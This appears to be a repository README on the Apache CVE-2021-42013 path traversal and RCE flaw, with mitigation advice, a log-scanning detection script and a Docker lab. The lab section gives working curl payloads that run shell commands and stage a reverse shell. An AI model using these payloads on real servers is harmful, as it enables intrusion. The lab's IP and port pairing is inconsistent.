## https://sploitus.com/exploit?id=C5A61CC6-919E-58B4-8FBB-0198654A7FC8
# CVE-2021-42013: Apache HTTP Server Path Traversal and Remote Code Execution Vulnerability
## Overview
This repository provides information and resources related to CVE-2021-42013, a critical vulnerability in the Apache HTTP Server (version 2.4.50). The vulnerability allows path traversal and remote code execution (RCE) through a crafted URL path, enabling attackers to access and execute files outside the server's document root.
### Details
- CVE Identifier: CVE-2021-42013
- Severity: Critical
- Affected Versions: Apache HTTP Server 2.4.50
- Fixed Version: Apache HTTP Server 2.4.51 or later
### Description
CVE-2021-42013 is a vulnerability resulting from an incomplete fix for CVE-2021-41773. This flaw permits attackers to perform path traversal and potentially execute arbitrary code on the server. Exploitation of this vulnerability can lead to significant security breaches, including unauthorized access to sensitive data and full system compromise.
## Impact
Successful exploitation of CVE-2021-42013 can result in:
1. Unauthorized File Access: Attackers can access files outside the server’s document root, including sensitive system files, configuration files, and other protected resources. This could lead to the exposure of critical information, such as credentials, internal configurations, and other sensitive data.
2. Remote Code Execution: By accessing and executing arbitrary files, attackers can potentially run malicious scripts or binaries on the server. This could allow them to take control of the server, install malware, create backdoors, and manipulate server operations.
3. Service Disruption: Unauthorized access and execution of commands can disrupt normal server operations, leading to downtime, performance degradation, and denial of service (DoS) conditions. This impacts the availability and reliability of the services hosted on the server.
4. Privilege Escalation: In cases where the server runs with elevated privileges, an attacker exploiting this vulnerability could gain administrative access, allowing them to perform further malicious activities and escalate their control over the server environment.
5. Data Integrity Compromise: Attackers could modify or delete critical files, compromising the integrity of the data hosted on the server. This includes altering website content, defacing web pages, or tampering with application data.
## Mitigation
To protect your server from CVE-2021-42013, it is crucial to:
1. Update Apache HTTP Server: Upgrade to version 2.4.51 or later, where this vulnerability has been addressed.
2. Restrict Access: Ensure proper server configuration to restrict access to only necessary files and directories, reducing the risk of path traversal attacks.
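Alongside these two steps, existing access logs can be checked for the double-encoded traversal this CVE relies on. The script below is an added example, not part of this repository: it assumes Apache's common/combined log format, the function names are hypothetical, and the sample log lines are constructed. It decodes each request path repeatedly, which shows why a single decoding pass (the incomplete fix for CVE-2021-41773) still leaves an encoded dot segment behind.

```python
import posixpath
import re
from urllib.parse import unquote

# Request line inside an Apache common/combined log entry: "METHOD target HTTP/x"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
MAX_PASSES = 5  # bound on repeated decoding (assumed limit for this example)


def decode_passes(path):
    """Percent-decode until the path stops changing; return (decoded, passes)."""
    passes = 0
    while passes < MAX_PASSES:
        decoded = unquote(path)
        if decoded == path:
            break
        path, passes = decoded, passes + 1
    return path, passes


def classify(target):
    """Return None for a clean path, else a short reason string."""
    path = target.split("?", 1)[0]
    decoded, passes = decode_passes(path)
    if ".." not in decoded.split("/"):
        return None
    # Where the path ends up once the dot segments are resolved.
    resolved = posixpath.normpath(decoded)
    kind = "double-encoded" if passes > 1 else "encoded" if passes == 1 else "plain"
    return f"{kind} traversal -> {resolved}"


def scan(lines):
    """Yield (line_number, reason) for every log line carrying a traversal."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and (reason := classify(match["target"])):
            yield number, reason


# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '172.17.0.1 - - [10/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 45',
    '172.17.0.1 - - [10/Oct/2021:10:00:02 +0000] "GET /icons/.%2e/.%2e/etc/passwd HTTP/1.1" 403 199',
    '172.17.0.1 - - [10/Oct/2021:10:00:03 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 120',
    '172.17.0.1 - - [10/Oct/2021:10:00:04 +0000] "GET /docs/report%20v2.pdf HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, reason in scan(SAMPLE_LOG):
        print(f"line {number}: {reason}")
```

A hit on a patched server still indicates that someone probed for the flaw, so the source address is worth reviewing either way.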
## Simulation
Now, how about a simulation? Before we start, you need Docker Engine installed on your computer. The installation is simple; the instructions are [here](https://docs.docker.com/engine/install/). We use Docker for the lab so that the exploitation of the vulnerability is simulated in an isolated environment, in line with ethical hacking. Enough yapping, let's start!
### Usage
1. Clone this repository
Use git to clone the repository:
```
git clone https://github.com/rafifdna/CVE-2021-42013.git
```
Change into the repository directory:
```
cd CVE-2021-42013
```
2. Prepare Lab
First, build the image from the Dockerfile with the command below (the trailing `.` is the build context, the current directory):
```
docker build -t apache-lab .
```
Then, after the image is built, run a container from it with the command below:
```
docker run -dit -p 888:80 apache-lab
```
3. Verify Lab (Optional)
You can also check Docker to make sure the lab container is running:
```
docker ps
```
```
docker logs <container-id>
```
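Make sure the web server is responding; you can curl it to see the output. With the `-p 888:80` mapping above, Docker publishes the container's port 80 on port 888 of the Docker host, so from the host the lab answers on the host's own address at port 888.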
```
curl http://172.17.0.2:888
```
4. Execution
Install the required libraries:
```
pip install -r requirements.txt
```
Before continuing to the execution, you can use the exploit.py script to check whether the target website is vulnerable. The script covers both Path Traversal and Remote Code Execution (RCE).
```
python3 exploit.py -u http://172.17.0.2
```
Next, try the same thing with curl:
```
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; uname -a'
```
```
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; ls'
```
## Exploitation
1. Remote Code Execution
Using Reverse Shell With Netcat
```
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; echo "#!/bin/bash" > /tmp/lab.sh'
```
```
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; echo "bash -i >& /dev/tcp/127.0.0.1/221 0>&1" >> /tmp/lab.sh'
```
```
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; cat /tmp/lab.sh'
```
Using Metasploit
### References
[CVE-2021-42013 Details](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)